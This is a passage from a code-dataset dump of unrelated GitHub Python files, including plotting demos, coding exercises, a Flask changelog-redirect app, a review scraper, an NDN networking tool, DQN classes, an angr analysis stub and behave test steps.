respuesta\n\n","repo_name":"GuillermoGarcia/avispro-api","sub_path":"app/api/v1/personajes.py","file_name":"personajes.py","file_ext":"py","file_size_in_byte":8686,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"2694900487","text":"# -*- coding:utf-8 -*-\n\"\"\"\n@project = 0527-2\n@file = matplotlib_1\n@author = Liangjisheng\n@create_time = 2018/5/27 0027 下午 17:33\n\"\"\"\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef simple_test():\n    plt.figure(1) # 创建图表1\n    plt.figure(2) # 创建图表2\n    plt.show() # 显示所有图表\n\ndef simple_test2():\n    plt.figure(1) # 创建图表1\n    plt.subplot(223) # 创建2*2的图表矩阵,绘制的子图为矩阵中的3序号\n    plt.show()\n\ndef simple_test3():\n    plt.figure(1, 
dpi=50) # 创建图表1,dpi为设置图表的大小,默认dpi=80\n plt.subplot(221)\n plt.subplot(222)\n plt.subplot(223)\n plt.subplot(224)\n plt.show()\n\ndef simple_test4():\n \"\"\"在多个表中创建子图\"\"\"\n plt.figure(1, dpi=50)\n plt.subplot(111) # 在图表1中创建子图\n plt.figure(2, dpi=50)\n plt.subplot(221)\n plt.show()\n\ndef plot_sin():\n plt.figure(1, dpi=50)\n x = np.linspace(-np.pi, np.pi, 100)\n plt.plot(x, np.sin(x))\n plt.show()\n\ndef plot_sca():\n \"\"\"sca()函数,选择子图\"\"\"\n plt.figure(1, dpi=50)\n ax1 = plt.subplot(211) # 创建子图ax1\n ax2 = plt.subplot(212) # 创建子图ax2\n\n x = np.linspace(0, 10, 100)\n plt.sca(ax1) # 选择子图ax1\n plt.plot(x, np.exp(x))\n\n plt.sca(ax2)\n plt.plot(x, np.sin(x))\n\n plt.show()\n\ndef plot_over_one_curve():\n \"\"\"在一张表中画多个曲线\"\"\"\n x = np.linspace(-np.pi * 2, np.pi * 2, 100)\n plt.figure(1, dpi=50)\n\n for i in range(1, 5):\n plt.plot(x, np.sin(x / i))\n\n plt.show()\n\ndef plot_hist():\n \"\"\"绘制直方图\"\"\"\n plt.figure(1, dpi=50)\n data = [1, 1, 1, 2, 2, 2, 3, 3, 4, 5, 5, 6, 4]\n plt.hist(data) # 只要传入数据,直方图就会统计数据出现的次数\n plt.show()\n\ndef plot_scatter():\n \"\"\"绘制散点图\"\"\"\n x = np.arange(1, 10)\n y = x * 2 + 1\n fig = plt.figure()\n # c = 'r'表示散点的颜色为红色,marker 表示指定散点的形状为圆\n plt.scatter(x, y, c='r', marker='o')\n plt.show()\n\ndef plot_pie():\n \"\"\"绘制饼图\"\"\"\n data = [100, 500, 300]\n fig = plt.figure(dpi=80)\n plt.pie(data, # 每个饼块的实际数据,如果大于1,会进行归一化,计算百分比\n explode=[0., 0., 0.1], # 每个饼块里中心的距离\n colors=['y', 'r', 'g'], # 每个饼块的颜色\n labels=['A part', 'B part', 'C part'], # 每个饼块的标签\n labeldistance=1.1, # 每个饼块标签到中心的距离\n autopct='%1.1f%%', # 百分比的显示格式\n pctdistance=0.5, # 百分比到中心的距离\n shadow=True, # 每个饼块是否显示阴影\n startangle=0, # 默认从x轴正半轴逆时针起\n radius=1) # 饼块的半径\n plt.show()\n\ndef plot_load_file():\n \"\"\"加载文件并绘图\"\"\"\n data = np.loadtxt('data.txt', delimiter=',')\n # print(type(data)) # \n # print(data.shape) # (21, 2)\n # ro表示每个数据在图表上打印的是红色的圆点\n plt.plot(data[:, 0], data[:, 1], 'ro')\n plt.show()\n\n\nif __name__ == '__main__':\n # simple_test()\n # simple_test2()\n # simple_test3()\n # simple_test4()\n # plot_sin()\n # plot_sca()\n # plot_over_one_curve()\n # plot_hist()\n # plot_scatter()\n # plot_pie()\n plot_load_file()\n","repo_name":"liangjisheng/python-demos","sub_path":"matplotlib/matplotlib_1.py","file_name":"matplotlib_1.py","file_ext":"py","file_size_in_byte":3507,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36458042565","text":"import sys\nsys.dont_write_bytecode = True\n\nfrom harbor3d import Dock, Shipwright\nfrom harbor3d.util import edges_util\nimport numpy as np\nimport os\n\nsys.path.append(os.sep.join(os.path.dirname(os.path.abspath(__file__)).split(os.sep)[:-1]))\nfrom const import Const as MasterConst\n\nclass Const:\n edges = [(1.50,0.66),(1.50,0.76),(1.50,0.86),(1.50,1.11),(1.50,1.21),(1.49,1.31),(1.47,1.40),(1.45,1.50),(1.42,1.59),(1.39,1.68),(1.35,1.77),(1.30,1.86),(1.25,1.94),(1.19,2.02),(1.13,2.10),(1.06,2.17),(0.99,2.24),(0.91,2.30),(0.83,2.36),(0.75,2.41),(0.66,2.46),(0.57,2.50),(0.48,2.53),(0.39,2.56),(0.29,2.58),(0.20,2.60),(0.10,2.61),(-0.00,2.61),(-0.10,2.61),(-0.20,2.60),(-0.29,2.58),(-0.39,2.56),(-0.48,2.53),(-0.57,2.50),(-0.66,2.46),(-0.75,2.41),(-0.83,2.36),(-0.91,2.30),(-0.99,2.24),(-1.06,2.17),(-1.13,2.10),(-1.19,2.02),(-1.25,1.94),(-1.30,1.86),(-1.35,1.77),(-1.39,1.68),(-1.42,1.59),(-1.45,1.50),(-1.47,1.40),(-1.49,1.31),(-1.50,1.21),(-1.50,1.11),(-1.50,0.86),(-1.50,0.77),(-1.50,0.67),(-1.50,-2.05),(1.50,-2.05)]\n x_range, y_range = edges_util.size(edges)\n x_min, x_max = x_range\n\ndef 
chest_to_neck(sw: Shipwright):\n geta_1 = sw.void(MasterConst.Chest.module_length)\n geta_2 = sw.parent(geta_1).rotate(MasterConst.Chest.chest_to_neck_side_bend_right).void()\n return sw.parent(geta_2).rotate_x(MasterConst.Chest.chest_to_neck_adduction)\n\ndef chest_to_right_arm(sw: Shipwright):\n geta_1 = sw.void(MasterConst.Chest.module_length)\n geta_2 = sw.parent(geta_1, MasterConst.Arm.z_position_chest_height_ratio)\\\n .move_xy(Const.x_max, MasterConst.Arm.y_position)\n geta_3 = sw.parent(geta_2).rotate(np.pi/2).void()\n return sw.parent(geta_3).rotate(0.,MasterConst.Arm.Right.shoulder_flexion).void()\n\ndef chest_to_left_arm(sw:Shipwright):\n geta_1 = sw.void(MasterConst.Chest.module_length)\n geta_2 = sw.parent(geta_1, MasterConst.Arm.z_position_chest_height_ratio)\\\n .move_xy(Const.x_min, MasterConst.Arm.y_position)\n geta_3 = sw.parent(geta_2).rotate(np.pi/2, np.pi).void()\n return sw.parent(geta_3).rotate(0.,-MasterConst.Arm.Left.shoulder_flexion).void()\n\ndef chest_to_backpack(sw:Shipwright):\n geta_1 = sw.void(MasterConst.Chest.module_length)\n geta_2 = sw.parent(geta_1, MasterConst.Backpack.z_position_chest_height_ratio)\\\n .move_y(MasterConst.Backpack.y_position_chest_offset)\n return sw.parent(geta_2).rotate_x(np.pi/2)\n\ndef main():\n path = os.path.join(os.path.dirname(os.path.abspath(__file__)))\n fname = path.split(os.sep)[-1] + '.stl'\n\n sw = Shipwright(Dock())\n\n chest = sw.void(MasterConst.Chest.module_length)\n chest.add_ribs(edges=Const.edges)\n chest.add_ribs([-0.01, 1.01], [(0.,0.)])\n chest.order_ribs()\n \n sw.generate_stl_binary(path, fname, divided=False)\n\nif __name__ == \"__main__\":\n main()","repo_name":"MurataUni/ModelingScript_Eltemus","sub_path":"chest/chest.py","file_name":"chest.py","file_ext":"py","file_size_in_byte":2807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28656372939","text":"valores = list()\nfor v in range(0,5):\n valor = int(input('Digite um valor: '))\n if v == 0 or valor > valores[-1]:\n valores.append(valor)\n print('Adicionado no final da lista.') \n else:\n pos = 0\n while pos < len(valores):\n if valor <= valores[pos]:\n valores.insert(pos, valor)\n print(f'Adicionado na posição {pos} da lista.')\n break\n pos += 1\nprint('-='*30)\nprint(valores)","repo_name":"fpgodoy/Exercicios-Python","sub_path":"ex080.py","file_name":"ex080.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"3348554352","text":"class Solution:\n def combine(self, n: int, k: int) -> List[List[int]]:\n self.res, self.k = [], k\n self.dfs(1, [], n)\n return self.res\n\n def dfs(self, first, path, n):\n if len(path) == self.k:\n self.res.append(path)\n return\n for i in range(first, n+1):\n self.dfs(i+1, path+[i], n)\n","repo_name":"sasankyadavalli/leetcode","sub_path":"combine_77.py","file_name":"combine_77.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6877678235","text":"import os\nimport urllib\n\nfrom flask import Flask, redirect, render_template, request\nfrom flask_migrate import Migrate\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_wtf import FlaskForm\nfrom whitenoise import WhiteNoise\nfrom wtforms_sqlalchemy.orm import model_form\n\nflask_app = Flask(__name__)\napp = WhiteNoise(flask_app, root='static/')\n\nflask_app.config['SQLALCHEMY_DATABASE_URI'] = 
os.getenv('DATABASE_URL', default='postgres://dsanders@localhost/wheres_the_changelog')\nflask_app.secret_key = 'derp'\n\ndb = SQLAlchemy(flask_app)\nmigrate = Migrate(flask_app, db)\n\n\nclass Changelog(db.Model):\n    id = db.Column(db.Integer, primary_key=True)\n    changelog_url = db.Column(db.String)\n    package_name = db.Column(db.String)\n\n\nChangelogForm = model_form(Changelog, base_class=FlaskForm)\n\n\n@flask_app.route('/', methods=('GET', 'POST'))\ndef main():\n    form = ChangelogForm(data={'package_name': request.args.get('new_package')})\n    if form.validate_on_submit():\n        changelog = Changelog(package_name=form.package_name.data, changelog_url=form.changelog_url.data)\n        db.session.add(changelog)\n        db.session.commit()\n        return redirect('/')\n    changelogs = Changelog.query.all()\n\n    return render_template('base.html', changelogs=changelogs, form=form)\n\n\n@flask_app.route('/<package_name>')\ndef where_is_it(package_name):\n    try:\n        the_changelog = Changelog.query.filter_by(package_name=package_name).first()\n        return redirect(the_changelog.changelog_url)\n    except:\n        return redirect('/?{}'.format(urllib.parse.urlencode({'new_package': package_name})))\n","repo_name":"shangxiao/wheres-the-changelog-flask","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"37571059658","text":"from bs4 import BeautifulSoup\nimport urllib\nimport urllib.request as ur\nimport pandas as pd\nfrom datetime import datetime\nimport numpy as np\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nfrom nltk import ngrams\nfrom collections import Counter\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom nltk.stem import WordNetLemmatizer\nimport nltk\nfrom urllib.request import Request, urlopen\nimport random\nimport matplotlib.pyplot as plt\n\ndef comment_scrape(WEBSITE, Page):\n    comments = []\n    rates = []\n    dates = []\n\n    # type in the website you want to scrape and analyze the trends over time!!!!!\n    # example WEBSITE = 'www.betfair.com'\n    \n    user_agents_list = [\n        'Mozilla/5.0 (iPad; CPU OS 13_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148',\n        'Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.83 Safari/537.36',\n        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36',\n        'python-requests/3.10.0',\n        'python-requests/2.14.0',\n        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36',\n        'Mozilla/5.0 (iPhone; CPU iPhone OS 14_4_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1',\n        'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)',\n        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Edg/87.0.664.75',\n        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363'\n    ]\n    \n\n    for page in range(1, Page):\n        if page == 1:\n            req = Request(\n                url='https://www.trustpilot.com/review/'+ WEBSITE, \n                headers={'User-Agent': random.choice(user_agents_list)}\n            )\n#             url = ur.urlopen('https://www.trustpilot.com/review/'+ WEBSITE)\n\n        else:\n            req = Request(\n                url='https://www.trustpilot.com/review/'+ WEBSITE +'?page=' + str(page), \n                headers={'User-Agent': random.choice(user_agents_list)}\n            
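# a User-Agent is drawn at random for each request\n            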
)\n \n# url = ur.urlopen('https://www.trustpilot.com/review/'+ WEBSITE +'?page=' + str(page))\n \n content = urlopen(req).read()\n# content = url.read()\n soup = BeautifulSoup(content, 'lxml')\n\n table_com_date = soup.findAll('div',attrs={\"class\":\"styles_reviewContent__0Q2Tg\"})\n table_rate = soup.findAll('div',attrs={\"class\":\"styles_reviewHeader__iU9Px\"})\n\n # scrape rates\n for x in table_rate:\n rates.append(x['data-service-review-rating'])\n\n # scrape comments and dates\n for x in table_com_date:\n\n comments.append(x.find('p').text)\n date = x.find('p', attrs = {\"class\": \"typography_body-m__xgxZ_ typography_appearance-default__AAY17 typography_color-black__5LYEn\"}).text[20:]\n date = datetime.strptime(date , \"%B %d, %Y\")\n dates.append(date)\n \n d = {'Review': comments, 'Rate': rates,'Date': dates }\n df = pd.DataFrame(d)\n df = df.set_index(['Date'])\n \n # print ratio\n print('Rate counts shows below:')\n print(df['Rate'].value_counts())\n print('\\nRate counts ratio shows below:')\n print(df.Rate.value_counts(normalize=True))\n \n print('\\nReview groupby year shows below:')\n print(df.groupby(df.index.year)['Review'].count())\n \n print('\\nScraped ' + str(len(df)) + ' reviews of ' + WEBSITE)\n \n return df\n\ndef trends_analyze(filename, Rate, Date):\n \n # read\n df = pd.read_csv (filename, lineterminator='\\n')\n\n # joins all the sentenses\n df['Review'] = [df['Review'].iloc[i].replace(\"\\r\", \" \") for i in range(len(df['Review']))]\n df['Date'] = [datetime.strptime(df['Date'].iloc[i], \"%Y-%m-%d\") for i in range(len(df['Review']))]\n df = df.set_index(['Date'])\n df = df.loc[df['Rate'] == Rate].loc[Date]\n \n sentence = \" \".join(df['Review'])\n # creates tokens, creates lower class, removes numbers and lemmatizes the words\n new_tokens = word_tokenize(sentence)\n new_tokens = [t.lower() for t in new_tokens]\n new_tokens =[t for t in new_tokens if t not in stopwords.words('english')]\n new_tokens = [t for t in new_tokens if t.isalpha()]\n\n # #counts the words, pairs and trigrams\n counted = Counter(new_tokens)\n counted_2= Counter(ngrams(new_tokens,2))\n counted_3= Counter(ngrams(new_tokens,3))\n\n # #creates 3 data frames and returns thems\n word_freq = pd.DataFrame(counted.items(),columns=['word','frequency']).sort_values(by='frequency',ascending=False)\n word_pairs =pd.DataFrame(counted_2.items(),columns=['pairs','frequency']).sort_values(by='frequency',ascending=False)\n trigrams =pd.DataFrame(counted_3.items(),columns=['trigrams','frequency']).sort_values(by='frequency',ascending=False)\n \n return word_freq, word_pairs, trigrams\n \ndef plot_chart(word_freq, word_pairs, trigrams):\n # create subplot of the different data frames\n fig, axes = plt.subplots(3,1,figsize=(9,15))\n sns.barplot(ax=axes[0],x='frequency',y='word',data=word_freq.head(30))\n sns.barplot(ax=axes[1],x='frequency',y='pairs',data=word_pairs.head(30))\n sns.barplot(ax=axes[2],x='frequency',y='trigrams',data=trigrams.head(30))\n \n return \n\ndef review_star_split(df):\n df['Rate'] = df['Rate'].astype(float)\n \n fig, axes = plt.subplots(nrows=1, ncols=2,figsize=(9, 4))\n\n df['Rate'].plot(kind='hist', edgecolor='black',ax=axes[0])\n axes[0].set_title(\"Review Star Distribution\")\n \n df = df.groupby([df.index.year, \"Rate\"]).count()\n df = df.groupby(level=0, group_keys=False).apply(lambda x:100 * x / float(x.sum()))\n df.unstack().plot(kind='bar', stacked=True, ax=axes[1])\n \n axes[1].set_title(\"Review Star Percentage over Time\")\n axes[1].legend(title=\"\")\n plt.show()\n 
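# bare return below: this helper only renders the two panels drawn above\n 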
return\n\ndef review_volume_trend(df):\n df['Rate'] = df['Rate'].astype(float)\n \n fig = plt.figure(figsize=(6, 6))\n df = df.groupby(df.index.year).count().pop('Review')\n df.plot(kind='bar', stacked=True)\n plt.title(\"Review Volume Trend\")\n plt.show()\n\n return\n\ndef review_pie_chart(df):\n \n df['Rate'] = df['Rate'].astype(float)\n \n fig, axes = plt.subplots(nrows=3, ncols=4,figsize=(12, 9))\n \n number_group = df.groupby(df.index.year).ngroups\n \n df = df.groupby([df.index.year, \"Rate\"]).count()\n df = df.groupby(level=0, group_keys=False).apply(lambda x:100 * x / float(x.sum()))\n\n \n for i, e in enumerate(df.index.levels[0]):\n yy = df.loc[e][\"Review\"].tolist()\n\n axes[i//4 , i%4].pie(yy, autopct='%1.1f%%', shadow=True, startangle=90)\n axes[i//4 , i%4].set_title(e)\n \n plt.show()\n \n return\n\n# Single Company (1)\n\nWEBSITE = 'williamhill.com'\nPage = 150\ndf = comment_scrape(WEBSITE, Page)\ndf.to_csv('review.csv')\n\n# Single Company (2)\nfilename = 'review.csv'\n\nRate = 1\nDate = '2020'\n\nword_freq, word_pairs, trigrams = trends_analyze(filename, Rate, Date)\nplot_chart(word_freq, word_pairs, trigrams)\n\n# Multi Company (1)\nWEBSITE = ['www.888.com', 'www.ladbrokes.com', 'www.skybet.com', 'www.paddypower.com', 'williamhill.com']\nPage = [30, 113, 73, 106, 197]\n\ndf_bag = pd.DataFrame()\n\nfor i in range(len(WEBSITE)):\n \n df = comment_scrape(WEBSITE[i], Page[i])\n df_bag = pd.concat([df_bag, df])\n \ndf_bag.to_csv('review.csv')\n\n# Multi Company (2)\nfilename = 'review.csv'\n\nRate = 5\nDate = '2012'\n\nword_freq, word_pairs, trigrams = trends_analyze(filename, Rate, Date)\nplot_chart(word_freq, word_pairs, trigrams)\n\n# review star split percentage\n\nreview_star_split(df_bag)\n\n# review volume trend\n\nreview_volume_trend(df_bag)\n\n# pie chart of reviews\n\nreview_pie_chart(df_bag)","repo_name":"aaronsxzhao/InvestmentAnalyst","sub_path":"online casino major app platform review analysis/website_scrape/comments_scrape.py","file_name":"comments_scrape.py","file_ext":"py","file_size_in_byte":8010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1450261515","text":"import os\nimport sys\nimport argparse\nfrom ...encoding import Name, InterestParam\nfrom ...appv2 import NDNApp, pass_all\nfrom ...security import KeychainDigest\nfrom ...types import InterestNack, InterestTimeout, InterestCanceled, ValidationFailure\n\n\ndef add_parser(subparsers):\n parser = subparsers.add_parser('Fetch-Data', aliases=['peek', 'fd', 'fetch-data'])\n parser.add_argument('-o', '--output', metavar='FILE',\n help=\"write the AppParam into a file. 
'-' for stdout\")\n parser.add_argument('-l', '--lifetime', metavar='LIFETIME', default=4000, type=int,\n help='set InterestLifetime, in milliseconds')\n parser.add_argument('-p', '--prefix', action='store_true',\n help='set CanBePrefix')\n parser.add_argument('-f', '--fresh', action='store_true',\n help='set MustBeFresh')\n parser.add_argument('-a', '--app-param', metavar='APP-PARAM',\n help=\"set ApplicationParameters from a file, '-' for stdin\")\n parser.add_argument('name', metavar='NAME',\n help='name or name prefix of the desired Data packet')\n parser.set_defaults(executor=execute)\n\n\ndef execute(args: argparse.Namespace):\n lifetime = args.lifetime\n try:\n name = Name.from_str(args.name)\n except (ValueError, IndexError):\n print(f'Invalid name: {args.name}')\n return -1\n\n try:\n if args.app_param:\n if args.app_param == '-':\n app_param = sys.stdin.read().encode()\n else:\n with open(os.path.expandvars(args.app_param), 'rb') as f:\n app_param = f.read()\n else:\n app_param = None\n except (ValueError, OSError, IndexError):\n print('Unable to read the input file')\n return -2\n\n app = NDNApp()\n\n async def after_start():\n try:\n print(f'Sending Interest {Name.to_str(name)},'\n f' {InterestParam(must_be_fresh=args.fresh, can_be_prefix=args.prefix, lifetime=lifetime)}')\n data_name, content, context = await app.express(\n name, validator=pass_all,\n must_be_fresh=args.fresh, can_be_prefix=args.prefix, lifetime=lifetime,\n app_param=app_param)\n meta_info = context['meta_info']\n\n print(f'Received Data Name: {Name.to_str(data_name)}')\n print(meta_info)\n if content:\n print(f'Content: (size {len(bytes(content))})')\n if args.output:\n if args.output == '-':\n print(bytes(content).decode())\n else:\n with open(os.path.expandvars(args.output), 'wb') as f:\n f.write(bytes(content))\n except InterestNack as e:\n print(f'Nacked with reason={e.reason}')\n except InterestTimeout:\n print('Timeout')\n except InterestCanceled:\n print('Local forwarder disconnected')\n except ValidationFailure:\n print('Data failed to validate')\n finally:\n app.shutdown()\n\n app.run_forever(after_start())\n","repo_name":"named-data/python-ndn","sub_path":"src/ndn/bin/tools/cmd_fetch_data.py","file_name":"cmd_fetch_data.py","file_ext":"py","file_size_in_byte":3200,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"72"} +{"seq_id":"2227695815","text":"\"\"\" Guessing game\nProgram selects a random number and then the user has to guess it. User selects the difficulty (Easy/Hard)\nwhich sets the number of attempts they get to guess the number\nIf the guess is right, hurrah but if the guess is wrong, the program hints by telling if the guess is \nhigher or lower than the number \n\"\"\"\n\n# Choose a number\nimport random\nnum = random.randint(0, 500)\n\n# Welcome User\nprint(\"Welcome to this Guessing Game - Higher or Lower\")\nprint(\"The number is between 0 & 500\")\n\n# Select Difficulty\ndifficulty = int(input(\"\\nSelect Difficulty for the game: \\n 1. Easy (10 attempts)\\n 2. Hard (3 attempts)\\n===> \"))\nif difficulty == 1:\n choice = 10\nelif difficulty == 2:\n choice = 3\n\nprint(\"Let's begin!\\n \\n\")\n\n# Ask for guesses\nwhile choice > 0:\n guess = int(input(\"What is your guess?\\n===> \"))\n if guess == num:\n print(\"Yes! That's the number\")\n break\n else: \n print(\"That's a wrong guess!\")\n if guess > num: \n print(\"That's high! Number is smaller than this.\")\n else:\n print(\"That's lower! 
Number is bigger than this.\") \n choice -= 1 \n \n print(f\"\\n{choice} attempts left.\\n\")\n if choice == 0:\n print(\"Oops! You couldn't guess the number. No attempts left. Play again!\")","repo_name":"sypai/100DaysOfPython","sub_path":"Day12/guessing_game.py","file_name":"guessing_game.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"6331575869","text":"import sys\ninput = sys.stdin.readline\n\nn = int(input())\narr = [0] * (n+1)\nfor i in range(1,n+1):\n arr[i] = max(arr[i],arr[i-1])\n t, p = map(int,input().split())\n if i+t-1 > n:\n continue\n arr[i+t-1] = max(arr[i-1]+p,arr[i+t-1])\n\nprint(arr[n])\n\n","repo_name":"cksdud150/HTG","sub_path":"7_2/14501.py","file_name":"14501.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8364868860","text":"import random\nfrom collections import namedtuple\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nTransition = namedtuple('Transition',\n ('state', 'action', 'next_state', 'reward', 'done'))\n\n\nclass ReplayMemory(object):\n\n def __init__(self, capacity):\n self.capacity = capacity\n self.memory = []\n self.position = 0\n\n def push(self, *args):\n \"\"\"Saves a transition.\"\"\"\n if len(self.memory) < self.capacity:\n self.memory.append(None)\n self.memory[self.position] = Transition(*args)\n self.position = (self.position + 1) % self.capacity\n\n def sample(self, batch_size):\n return random.sample(self.memory, batch_size)\n\n def __len__(self):\n return len(self.memory)\n\n\nclass DQN(nn.Module):\n\n def __init__(self, in_channels, num_actions):\n super(DQN, self).__init__()\n self.conv1 = nn.Conv2d(in_channels, 32, kernel_size=8, stride=4)\n self.conv2 = nn.Conv2d(32, 64, kernel_size=4, stride=2)\n self.conv3 = nn.Conv2d(64, 64, kernel_size=3, stride=1)\n self.fc4 = nn.Linear(3136, 512)\n self.fc5 = nn.Linear(512, num_actions)\n\n def forward(self, x):\n x = F.relu(self.conv1(x))\n x = F.relu(self.conv2(x))\n x = F.relu(self.conv3(x))\n x = F.relu(self.fc4(x.view(x.size(0), -1)))\n return self.fc5(x)\n\n\nclass DuelingDQN(nn.Module):\n\n def __init__(self, in_channels, num_actions):\n super(DuelingDQN, self).__init__()\n self.num_actions = num_actions\n\n self.conv1 = nn.Conv2d(in_channels, 32, kernel_size=8, stride=4)\n self.conv2 = nn.Conv2d(32, 64, kernel_size=4, stride=2)\n self.conv3 = nn.Conv2d(64, 64, kernel_size=3, stride=1)\n\n self.fc1_adv = nn.Linear(3136, 512)\n self.fc1_val = nn.Linear(3136, 512)\n\n self.fc2_adv = nn.Linear(512, num_actions)\n self.fc2_val = nn.Linear(512, 1)\n\n self.relu = nn.ReLU()\n\n def forward(self, x):\n x = self.relu(self.conv1(x))\n x = self.relu(self.conv2(x))\n x = self.relu(self.conv3(x))\n x = x.view(x.size(0), -1)\n\n adv = self.relu(self.fc1_adv(x))\n val = self.relu(self.fc1_val(x))\n\n adv = self.fc2_adv(adv)\n val = self.fc2_val(val).expand(x.size(0), self.num_actions)\n\n x = val + adv - adv.mean(1).unsqueeze(1).expand(x.size(0), self.num_actions)\n return x\n","repo_name":"ManuelEberhardinger/DQN-Atari-Project","sub_path":"DQN.py","file_name":"DQN.py","file_ext":"py","file_size_in_byte":2418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3173564380","text":"import angr\nimport logging\nlw = logging.getLogger(\"CustomSimProcedureWindows\")\n\nclass inet_addr(angr.SimProcedure):\n\n def run(self, 
cp):\n try:\n print(self.state.mem[cp].string.concrete)\n except:\n print(self.state.memory.load(cp,0x20))\n return 123456\n","repo_name":"csvl/SEMA-ToolChain","sub_path":"src/SemaSCDG/procedures/windows/custom_package/inet_addr.py","file_name":"inet_addr.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"72"} +{"seq_id":"73842682791","text":"\"\"\"\n# Definition for a Node.\nclass Node:\n def __init__(self, val=None, children=None):\n self.val = val\n self.children = children\n\"\"\"\n\nclass Solution:\n def levelOrder(self, root: 'Node') -> List[List[int]]:\n if not root:\n return []\n queue = [root]\n res = []\n while queue:\n current_level = []\n next_queue = []\n for i in queue:\n current_level.append(i.val)\n if i.children:\n for j in i.children:\n next_queue.append(j)\n res.append(current_level)\n queue = next_queue\n return res","repo_name":"YuanyuanQiu/LeetCode","sub_path":"0429 N-ary Tree Level Order Traversal.py","file_name":"0429 N-ary Tree Level Order Traversal.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3232174004","text":"# -*- coding: utf-8 -*-\nimport json\nimport time\n\nfrom behave import *\n\nfrom test import bdd_util\nfrom features.testenv.model_factory import *\n\nfrom django.test.client import Client\nfrom mall.models import *\nfrom modules.member.models import *\nfrom mall.promotion.models import CouponRule\nfrom utils.string_util import byte_to_hex\n\n@when(u\"{user}选择会员\")\ndef step_impl(context, user):\n context.member_ids = []\n for raw in context.table:\n query_hex = byte_to_hex(raw['member_name'])\n member = Member.objects.get(webapp_id=context.webapp_id, username_hexstr=query_hex)\n context.member_ids.append(str(member.id))\n\n@when(u\"{user}批量修改等级\")\ndef step_impl(context, user):\n member_ids = context.member_ids\n data = json.loads(context.text)[0]\n grade_name = data['member_rank']\n grade_id = MemberGrade.objects.get(webapp_id=context.webapp_id, name=grade_name).id\n args = {}\n if data['modification_method'] == '给选中的人修改等级':\n if not member_ids:\n return\n args['update_status'] = 'selected'\n args['ids'] = '-'.join(member_ids)\n elif data['modification_method'] == '给筛选出来的所有人修改等级':\n args['update_status'] = 'all'\n if hasattr(context, 'filter_str'):\n args['filter_value'] = context.filter_str\n\n\n args['grade_id'] = grade_id\n response = context.client.post('/member/api/batch_update_member_Grade/', args)\n bdd_util.assert_api_call_success(response)\n\n@when(u\"{user}批量添加分组\")\ndef step_impl(context, user):\n member_ids = context.member_ids\n data = json.loads(context.text)[0]\n tag_name = data['grouping']\n tag_id = MemberTag.objects.get(webapp_id=context.webapp_id, name=tag_name).id\n args = {}\n if data['modification_method'] == '给选中的人添加分组':\n if not member_ids:\n return\n args['update_status'] = 'selected'\n args['ids'] = '-'.join(member_ids)\n elif data['modification_method'] == '给筛选出来的所有人添加分组':\n args['update_status'] = 'all'\n if hasattr(context, 'filter_str'):\n args['filter_value'] = context.filter_str\n\n\n args['tag_id'] = tag_id\n response = context.client.post('/member/api/batch_update_member_tag/', args)\n bdd_util.assert_api_call_success(response)\n\n@when(u'{webapp_user}给\"{member}\"调分组')\ndef step_impl(context, webapp_user, member):\n url = '/member/api/update_member_tag_or_grade/'\n query_hex = byte_to_hex(member)\n member_id = 
